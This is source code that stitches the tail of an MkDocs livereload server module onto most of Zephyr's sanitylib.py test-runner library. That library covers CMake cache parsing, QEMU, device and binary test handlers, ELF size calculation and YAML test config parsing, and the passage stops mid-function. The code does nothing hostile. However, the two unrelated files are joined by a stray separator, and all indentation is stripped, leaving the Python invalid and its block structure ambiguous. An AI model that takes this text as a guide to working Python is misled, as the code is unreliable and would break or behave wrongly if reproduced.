# The page will reload if the livereload poller returns a newer epoch than what it knows.
# The other timestamp becomes just a unique identifier for the initiating page.
return (
b'%b<script src="/js/livereload.js"></script><script>livereload(%d, %d);</script>%b'
% (content[:body_end], epoch, _timestamp(), content[body_end:])
)
@classmethod
@functools.lru_cache() # "Cache" to not repeat the same message for the same browser tab.
def _log_poll_request(cls, url, request_id):
log.info(f"Browser connected: {url}")
def _guess_type(cls, path):
# MkDocs only ensures a few common types (as seen in livereload_tests.py::test_mime_types).
# Other uncommon types will not be accepted.
if path.endswith((".js", ".JS")):
return "application/javascript"
if path.endswith(".gz"):
return "application/gzip"
guess, _ = mimetypes.guess_type(path)
if guess:
return guess
return "application/octet-stream"
class _Handler(wsgiref.simple_server.WSGIRequestHandler):
def log_request(self, code="-", size="-"):
level = logging.DEBUG if str(code) == "200" else logging.WARNING
log.log(level, f'"{self.requestline}" code {code}')
def log_message(self, format, *args):
log.debug(format, *args)
def _timestamp():
return round(time.monotonic() * 1000)
|
sanitylib.py | #!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
import traceback
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib # pylint: disable=unused-import
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial or i.get('serial_pty', None):
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None) or self.suite.west_runner
serial_pty = hardware.get('serial_pty', None)
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware['serial']
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# sanitycheck to judge testing result by console output
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
logger.debug(f"No timeout, return code from qemu: {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
logger.debug(f"return code from qemu: {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
